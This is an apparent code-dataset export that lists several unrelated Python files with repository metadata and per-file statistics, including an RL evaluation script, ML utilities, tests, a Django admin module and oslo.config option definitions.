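                          param_name="alpha", param_range=np.logspace(-3, 3, 7), cv=cv)
    plt.show()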
| 42.578947
| 115
| 0.674083
| 370
| 2,427
| 4.186486
| 0.202703
| 0.092318
| 0.056811
| 0.054229
| 0.511298
| 0.356359
| 0.204003
| 0.204003
| 0.056811
| 0.056811
| 0
| 0.015432
| 0.199011
| 2,427
| 56
| 116
| 43.339286
| 0.781379
| 0.016893
| 0
| 0.081633
| 0
| 0
| 0.051616
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.102041
| 0
| 0.163265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13570cde1e5c8c95a0a1cd4eb53d4d9f0d94d653
| 297
|
py
|
Python
|
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
21-08/Starters8/1.py
|
allenalvin333/Codechef_Competitions
|
44c3626de33cd9e17d1acfc74abe0aab809efbad
|
[
"MIT"
] | null | null | null |
# https://www.codechef.com/START8C/problems/PENALTY
for T in range(int(input())):
n=list(map(int,input().split()))
a=b=0
for i in range(len(n)):
if(n[i]==1):
if(i%2==0): a+=1
else: b+=1
if(a>b): print(1)
elif(b>a): print(2)
else: print(0)
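# A short worked illustration of the scoring rule implemented above, assuming
# 0-based even kick indices belong to team 1 and odd indices to team 2; the
# kick sequence is made up.
kicks = [1, 0, 1, 1]       # team 1 converts kicks 0 and 2, team 2 converts kick 3
team1 = sum(kicks[0::2])   # 2
team2 = sum(kicks[1::2])   # 1
print(1 if team1 > team2 else 2 if team2 > team1 else 0)   # prints 1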
| 24.75
| 51
| 0.501684
| 54
| 297
| 2.759259
| 0.518519
| 0.09396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046296
| 0.272727
| 297
| 12
| 52
| 24.75
| 0.643519
| 0.164983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.3
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13583e5f15c53f390db50be7afda1b1e9f5ec33e
| 859
|
py
|
Python
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 7
|
2021-11-26T01:15:23.000Z
|
2022-03-15T10:51:47.000Z
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 4
|
2022-01-15T09:46:00.000Z
|
2022-02-05T07:10:18.000Z
|
util/eval.py
|
jhong93/vpd
|
1ed3e8631c46e078ecb9a7756dba1f1c14aead5b
|
[
"BSD-3-Clause"
] | 1
|
2021-09-18T16:50:14.000Z
|
2021-09-18T16:50:14.000Z
|
import matplotlib.pyplot as plt
from sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix
def save_confusion_matrix(truth, pred, out_file, norm=None):
label_names = list(set(truth) | set(pred))
label_names.sort()
truth_compact = [label_names.index(x) for x in truth]
pred_compact = [label_names.index(x) for x in pred]
cm = confusion_matrix(
truth_compact, pred_compact, labels=list(range(len(label_names))),
normalize=norm)
if norm is not None:
cm *= 100
fig = plt.figure(figsize=(20, 20))
ax = fig.add_subplot(111)
disp = ConfusionMatrixDisplay(
confusion_matrix=cm, display_labels=label_names)
disp.plot(ax=ax, xticks_rotation='vertical',
values_format='.1f' if norm is not None else 'd')
plt.tight_layout()
plt.savefig(out_file)
plt.close(fig)
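# A minimal usage sketch for save_confusion_matrix; the label lists and output
# path are made-up values used only to show the expected call shape.
if __name__ == "__main__":
    truth = ["cat", "dog", "dog", "bird", "cat", "cat"]
    pred = ["cat", "dog", "cat", "bird", "cat", "dog"]
    # Writes a row-normalized (percentage) confusion matrix to disk.
    save_confusion_matrix(truth, pred, "confusion_matrix.png", norm="true")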
| 35.791667
| 74
| 0.690338
| 121
| 859
| 4.719008
| 0.504132
| 0.105079
| 0.129597
| 0.077058
| 0.154116
| 0.101576
| 0.101576
| 0.101576
| 0
| 0
| 0
| 0.016058
| 0.202561
| 859
| 23
| 75
| 37.347826
| 0.817518
| 0
| 0
| 0
| 0
| 0
| 0.01397
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135933f07f224fa858e30bebe4b7db897823355d
| 995
|
py
|
Python
|
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | null | null | null |
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | 1
|
2021-03-19T14:06:50.000Z
|
2021-03-19T14:06:50.000Z
|
astroquery/neodys/tests/test_neodys_remote.py
|
B612-Asteroid-Institute/astroquery
|
4bc8002639e80f7356306f4e000334da5e086091
|
[
"BSD-3-Clause"
] | null | null | null |
from ... import neodys
def test_neodys_query():
test_object = "2018VP1"
res_kep_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=0)
res_kep_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="ke", epoch_near_present=1)
res_eq_0 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=0)
res_eq_1 = neodys.core.NEODyS.query_object(
test_object, orbital_element_type="eq", epoch_near_present=1)
assert len(res_kep_0['Keplerian State Vector']) == 6
assert len(res_kep_0['Covariance Matrix']) == 21
assert res_kep_0['Mean Julian Date'][0] != res_kep_1['Mean Julian Date'][0]
assert len(res_eq_0['Equinoctial State Vector']) == 6
assert len(res_eq_0['Covariance Matrix']) == 21
assert len(res_eq_0['Keplerian Correlation Matrix']) == 0
assert res_eq_0['Mean Julian Date'][0] != res_eq_1['Mean Julian Date'][0]
| 41.458333
| 79
| 0.711558
| 155
| 995
| 4.225806
| 0.225806
| 0.053435
| 0.045802
| 0.128244
| 0.789313
| 0.583206
| 0.451908
| 0.451908
| 0.451908
| 0.451908
| 0
| 0.039616
| 0.162814
| 995
| 23
| 80
| 43.26087
| 0.746699
| 0
| 0
| 0
| 0
| 0
| 0.188129
| 0
| 0
| 0
| 0
| 0
| 0.388889
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1359c0fa6a8b2dda6889c4d23c5bb6bc6ad1f0c0
| 9,806
|
py
|
Python
|
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | 1
|
2019-12-11T14:43:49.000Z
|
2019-12-11T14:43:49.000Z
|
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/rl/evaluator.py
|
SouBanerjee/tensor2tensor
|
8b88b13dd65bf52b3c27663a128adb7b0a5773fb
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Evaluation script for RL agents.
Example invocation:
python -m tensor2tensor.rl.evaluator \
--policy_dir=$HOME/t2t/rl_v1/policy \
--eval_metrics_dir=$HOME/t2t/rl_v1/full_eval_metrics \
--hparams_set=rlmb_base \
--hparams='batch_size=64'
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from tensor2tensor.data_generators import gym_env
from tensor2tensor.layers import common_video
from tensor2tensor.models.research import rl # pylint: disable=unused-import
from tensor2tensor.rl import rl_utils
from tensor2tensor.rl import trainer_model_based_params # pylint: disable=unused-import
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("output_dir", "", "Main directory for multi-runs.")
flags.DEFINE_integer("total_num_workers", 1, "How many workers in total.")
flags.DEFINE_string("worker_to_game_map", "", "How to map workers to games.")
flags.DEFINE_string("policy_dir", "", "Directory with policy checkpoints.")
flags.DEFINE_string("model_dir", "", "Directory with model checkpoints.")
flags.DEFINE_string(
"eval_metrics_dir", "", "Directory to output the eval metrics at."
)
flags.DEFINE_bool("full_eval", True, "Whether to ignore the timestep limit.")
flags.DEFINE_enum(
"agent", "policy", ["random", "policy", "planner"], "Agent type to use."
)
flags.DEFINE_bool(
"eval_with_learner", True,
"Whether to use the PolicyLearner.evaluate function instead of an "
"out-of-graph one. Works only with --agent=policy."
)
flags.DEFINE_string(
"planner_hparams_set", "planner_small", "Planner hparam set."
)
flags.DEFINE_string("planner_hparams", "", "Planner hparam overrides.")
flags.DEFINE_integer(
"log_every_steps", 20, "Log every how many environment steps."
)
flags.DEFINE_string(
"debug_video_path", "", "Path to save the planner debug video at."
)
# Unused flags needed to pass for multi-run infrastructure.
flags.DEFINE_bool("autotune", False, "Unused here.")
flags.DEFINE_string("objective", "", "Unused here.")
flags.DEFINE_string("client_handle", "client_0", "Unused.")
flags.DEFINE_bool("maximize_tuner_objective", True, "Unused.")
flags.DEFINE_integer("vizier_search_algorithm", 0, "Unused.")
@registry.register_hparams
def planner_tiny():
return tf.contrib.training.HParams(
num_rollouts=1,
planning_horizon=2,
rollout_agent_type="random",
batch_size=1,
env_type="simulated",
)
@registry.register_hparams
def planner_small():
return tf.contrib.training.HParams(
num_rollouts=64,
planning_horizon=16,
rollout_agent_type="policy",
batch_size=64,
env_type="simulated",
)
def make_env(env_type, real_env, sim_env_kwargs):
"""Factory function for envs."""
return {
"real": lambda: real_env.new_like( # pylint: disable=g-long-lambda
batch_size=sim_env_kwargs["batch_size"],
store_rollouts=False,
),
"simulated": lambda: rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames( # pylint: disable=g-long-lambda
**sim_env_kwargs
),
}[env_type]()
def make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs=None, frame_stack_size=None, planning_horizon=None,
rollout_agent_type=None, batch_size=None, num_rollouts=None,
inner_batch_size=None, video_writer=None, env_type=None):
"""Factory function for Agents."""
if batch_size is None:
batch_size = env.batch_size
return {
"random": lambda: rl_utils.RandomAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space
),
"policy": lambda: rl_utils.PolicyAgent( # pylint: disable=g-long-lambda
batch_size, env.observation_space, env.action_space,
policy_hparams, policy_dir, sampling_temp
),
"planner": lambda: rl_utils.PlannerAgent( # pylint: disable=g-long-lambda
batch_size, make_agent(
rollout_agent_type, env, policy_hparams, policy_dir,
sampling_temp, batch_size=inner_batch_size
), make_env(env_type, env.env, sim_env_kwargs),
lambda env: rl_utils.BatchStackWrapper(env, frame_stack_size),
num_rollouts, planning_horizon,
discount_factor=policy_hparams.gae_gamma, video_writer=video_writer
),
}[agent_type]()
def make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| 35.528986
| 112
| 0.730879
| 1,378
| 9,806
| 4.875181
| 0.219884
| 0.032748
| 0.022923
| 0.013397
| 0.244567
| 0.181155
| 0.123846
| 0.101816
| 0.086038
| 0.07919
| 0
| 0.007111
| 0.168264
| 9,806
| 275
| 113
| 35.658182
| 0.816577
| 0.135121
| 0
| 0.131455
| 0
| 0
| 0.134307
| 0.008194
| 0
| 0
| 0
| 0
| 0.014085
| 1
| 0.042254
| false
| 0
| 0.065728
| 0.00939
| 0.140845
| 0.004695
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135abe65fc98dab6544eb64993951b1e91db47a2
| 732
|
py
|
Python
|
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | 1
|
2021-02-09T10:30:44.000Z
|
2021-02-09T10:30:44.000Z
|
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/components/admin.py
|
njmhendrix/grand-challenge.org
|
9bc36f5e26561a78bd405e8ea5e4c0f86c95f011
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| 23.612903
| 74
| 0.67623
| 59
| 732
| 8.254237
| 0.525424
| 0.11499
| 0.078029
| 0.106776
| 0.11499
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206284
| 732
| 30
| 75
| 24.4
| 0.83821
| 0
| 0
| 0.173913
| 0
| 0
| 0.157104
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.086957
| 0
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f17354c6a575112f9dd1ee2ae823d8e499637
| 2,299
|
py
|
Python
|
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | 1
|
2020-12-18T06:10:16.000Z
|
2020-12-18T06:10:16.000Z
|
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | null | null | null |
debug/compute_score_common_ts_RETREAT.py
|
DavidSabbagh/meeg_power_regression
|
d9cd5e30028ffc24f08a52966c7641f611e92ee6
|
[
"BSD-3-Clause"
] | 2
|
2021-03-01T01:36:38.000Z
|
2021-03-01T13:44:02.000Z
|
import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
    n_sub, n_fb, n_ch, _ = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
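# A self-contained sketch of the two projection helpers above on synthetic SPD
# covariance matrices, meant only to illustrate the expected array shapes; the
# sizes and the _demo_projection name are arbitrary assumptions.
def _demo_projection(n_sub=4, n_fb=3, n_ch=10, demo_rank=5):
    # Random SPD matrices standing in for real covariances (illustrative only).
    rng = np.random.RandomState(0)
    A = rng.randn(n_sub, n_fb, n_ch, n_ch)
    spd = np.matmul(A, A.transpose(0, 1, 3, 2)) + n_ch * np.eye(n_ch)
    demo_covs = [{'subject': i, 'covs': c} for i, c in enumerate(spd)]
    proj = proj_covs_common(demo_covs, picks=np.arange(n_ch),
                            scale=1.0, rank=demo_rank, reg=1e-6)
    ts = proj_covs_ts(proj)
    print(proj.shape, ts.shape)   # (4, 3, 5, 5) (4, 3, 15)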
| 31.930556
| 77
| 0.651588
| 381
| 2,299
| 3.742782
| 0.333333
| 0.014727
| 0.017532
| 0.024544
| 0.146564
| 0.110799
| 0.091164
| 0.023843
| 0.023843
| 0
| 0
| 0.016912
| 0.202697
| 2,299
| 71
| 78
| 32.380282
| 0.761047
| 0.041757
| 0
| 0.037037
| 0
| 0
| 0.058663
| 0.021828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.185185
| 0
| 0.259259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f22f80a61bf2986149f078e69c6a03f73a3a5
| 1,161
|
py
|
Python
|
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | 1
|
2017-08-30T01:01:50.000Z
|
2017-08-30T01:01:50.000Z
|
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | null | null | null |
bter/publish.py
|
mengalong/bter
|
7fa56f9c83429bc564e6d123498b14aae5c390b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017~ mengalong <alongmeng@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import daiquiri
from six.moves.urllib import parse as urlparse
from stevedore import driver
logger = daiquiri.getLogger(__name__)
class PublisherManager(object):
def __init__(self, conf, url):
self.conf = conf
self.url = url
parsed_url = urlparse.urlparse(url)
logger.debug("The parsed url for publisher is :%s" % str(parsed_url))
self.publish_driver = driver.DriverManager(
'bter.publisher',
parsed_url.scheme,
invoke_args=(self.conf,),
invoke_on_load=True).driver
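# A minimal usage sketch for PublisherManager, assuming a hypothetical 'udp'
# plugin has been registered under the 'bter.publisher' stevedore namespace and
# a plain dict stands in for the real configuration object.
if __name__ == "__main__":
    manager = PublisherManager(conf={}, url="udp://127.0.0.1:9999")
    print(manager.publish_driver)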
| 33.171429
| 77
| 0.709733
| 160
| 1,161
| 5.05625
| 0.61875
| 0.074166
| 0.032138
| 0.039555
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008724
| 0.210164
| 1,161
| 34
| 78
| 34.147059
| 0.873501
| 0.490956
| 0
| 0
| 0
| 0
| 0.084922
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.2
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
135f9d0a7a2f751997f717a3c72579433fa4791e
| 4,269
|
py
|
Python
|
dnsdb/config.py
|
nuby/open_dnsdb
|
7fec703d8458083f0e6826393656055556e9f0b2
|
[
"Apache-2.0"
] | 1
|
2019-09-27T01:06:55.000Z
|
2019-09-27T01:06:55.000Z
|
dnsdb/config.py
|
cclauss/open_dnsdb
|
28c2055685be1c173d77eaa2a05d8e156ccbbbf2
|
[
"Apache-2.0"
] | null | null | null |
dnsdb/config.py
|
cclauss/open_dnsdb
|
28c2055685be1c173d77eaa2a05d8e156ccbbbf2
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
from datetime import timedelta
from oslo.config import cfg
CONF = cfg.CONF
CONF.register_opts([
cfg.StrOpt('log-dir'),
cfg.StrOpt('log-file'),
cfg.StrOpt('debug'),
cfg.StrOpt('verbose'),
], 'log')
CONF.register_opts([
cfg.StrOpt('connection'),
cfg.StrOpt('data'),
], 'DB')
CONF.register_opts([
cfg.StrOpt('server'),
cfg.StrOpt('port'),
cfg.StrOpt('from_addr'),
cfg.StrOpt('info_list'),
cfg.StrOpt('alert_list'),
], 'MAIL')
CONF.register_opts([
cfg.StrOpt('allow_ip'),
cfg.StrOpt('secret_key'),
cfg.StrOpt('env'),
cfg.StrOpt('local_group'),
cfg.StrOpt('acl_dir'),
cfg.StrOpt('view_acl_group')
], 'etc')
CONF.register_opts([
cfg.IntOpt('dnsupdater_port'),
], 'api')
CONF.register_opts([
cfg.StrOpt('acl_groups'),
cfg.IntOpt('cname_ttl'),
cfg.StrOpt('view_zone')
], 'view')
CONF.register_opts([
cfg.StrOpt('base-url',
default='/',
help='The url prefix of this site.'),
cfg.StrOpt('run-mode',
default="werkzeug",
choices=('gunicorn', 'werkzeug'),
help="Run server use the specify mode."),
cfg.StrOpt('bind',
default='0.0.0.0',
help='The IP address to bind'),
cfg.IntOpt('port',
default=8080,
help='The port to listen'),
cfg.BoolOpt('debug',
default=False),
], 'web')
CONF.register_opts([
cfg.StrOpt('config',
default=None,
help='The path to a Gunicorn config file.'),
cfg.StrOpt('bind',
default='127.0.0.1:8888'),
cfg.IntOpt('workers',
default=0,
help='The number of worker processes for handling requests'),
cfg.BoolOpt('daemon',
default=False,
help='Daemonize the Gunicorn process'),
cfg.StrOpt('accesslog',
default=None,
               help='The Access log file to write to. '
'"-" means log to stderr.'),
cfg.StrOpt('loglevel',
default='info',
help='The granularity of Error log outputs.',
choices=('debug', 'info', 'warning', 'error', 'critical')),
cfg.BoolOpt('ignore-healthcheck-accesslog',
default=False),
cfg.IntOpt('timeout',
default=30,
help='Workers silent for more than this many seconds are '
'killed and restarted.'),
cfg.StrOpt('worker-class',
default='sync',
help='The type of workers to use.',
choices=('sync', 'eventlet', 'gevent', 'tornado'))
], 'gunicorn')
